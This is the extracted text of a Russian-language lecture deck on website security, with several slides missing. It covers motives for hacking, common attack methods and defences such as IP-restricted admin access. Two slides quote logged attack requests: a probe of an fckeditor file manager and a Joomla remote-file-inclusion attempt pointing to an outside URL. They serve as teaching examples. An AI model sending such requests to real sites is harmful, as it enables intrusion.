Скачать презентацию
Идет загрузка презентации. Пожалуйста, подождите
Презентация была опубликована 9 лет назад пользователемРимма Башкирёва
1 Безопасность сайта Факультет Интернета МФПУ СИНЕРГИЯ Курс «Веб-разработка» Илья Ершов
2 Зачем взламывают сайты? Заражение страниц сайта вирусами для последующих атак посетителей Взлом базы данных сайта, кража конфиденциальной информации Взлом сайта для размещения SEO ссылок Заказной взлом сайта Подмена информации на сайте Создание распределённой вычислительной сети
3 Как взламывают сайты? 1. Человеческий фактор 2. Подбор пароля 3. Кража Cookie 4. Подброс исполняемых файлов на хостинг 1. Шеллы 2. Вирусы 5.SQL-инъекция a)Для извлечения пароля админа b)Для прямого манипулирования БД c)Для подброса на сервер исполняемых файлов 6. Уязвимости серверного ПО
4 Как защититься? 1. Фильтруйте все данные поступающие от пользователей 2. Меняйте префиксы таблиц базы данных 3. Переопределяйте путь к админке 4. Закрывайте к уязвимым разделам доступ по IP адресу 5. Протоколируйте попытки проникновения 6. Обновляйте всё ПО
5 Кража Cookie
14 Перебор всех вариантов Количество комбинаций = 29 разрядов В день 1 сервер может перебрать комбинаций Общее количество дней = 24 разряда Количество лет
15 Количество сессий Количество пользователей Количество сессий Количество лет на подбор одной сессии
16 SQL-инъекция Ссылки и дополнительные материалы на странице: //j.mp/mfpa-links
17 Trap 4 hacker REMOTE_ADDR Попытка 1 от :37:53 HOST DNS NAME hn.kd.ny.adsl REQUEST_URI /admin/fckeditor/editor/filemanager/browser/default/connect ors/connector.php?Command=GetFoldersAndFiles&Type=Image&Cur rentFolder=/ Регион Китай - Чжэнчжоу Ссылки и дополнительные материалы на странице: //j.mp/mfpa-links
18 Trap 4 hacker REMOTE_ADDR Попытка 1 от :47:21 HOST DNS NAMEeeyore.smith-family.com HTTP_USER_AGENT REQUEST_URI /administrator/components/com_extended_registration/admi n.extended_registration.php?mosConfig_absolute_path= google.com/humans.txt? РегионСША - Сильмар Ссылки и дополнительные материалы на странице: //j.mp/mfpa-links
19 Шелл p.a.s. 2.0
22 Обфускация (маскирование кода)
23 Безопасность //exploit-db.com
24 Безопасность //exploit-db.com Joomla
25 Безопасность //exploit-db.com Joomla
26 Безопасность //exploit-db.com Wordpress
27 Безопасность //exploit-db.com MODX
28 Как защититься? 1. Фильтруйте все данные поступающие от пользователей 2. Меняйте префиксы таблиц базы данных 3. Переопределяйте путь к админке 4. Закрывайте к уязвимым разделам доступ по IP адресу 5. Протоколируйте попытки проникновения 6. Обновляйте всё ПО Ссылки и дополнительные материалы на странице: //j.mp/mfpa-links
29 MODX Подмена пути к админке
30 MODX Подмена префикса таблиц
31 Запрет доступа чужим IP адресам Файл admin/.htaccess RewriteEngine Off Order deny,allow Deny from all Allow from # home Allow from # work
32 Спасибо за внимание
33 Илья Ершов Веб-разработчик, руководитель интернет-проектов Skype: ershov.ilya Ссылки и дополнительные материалы на странице: //j.mp/mfpa-links
Еще похожие презентации в нашем архиве:
© 2024 MyShared Inc.
All rights reserved.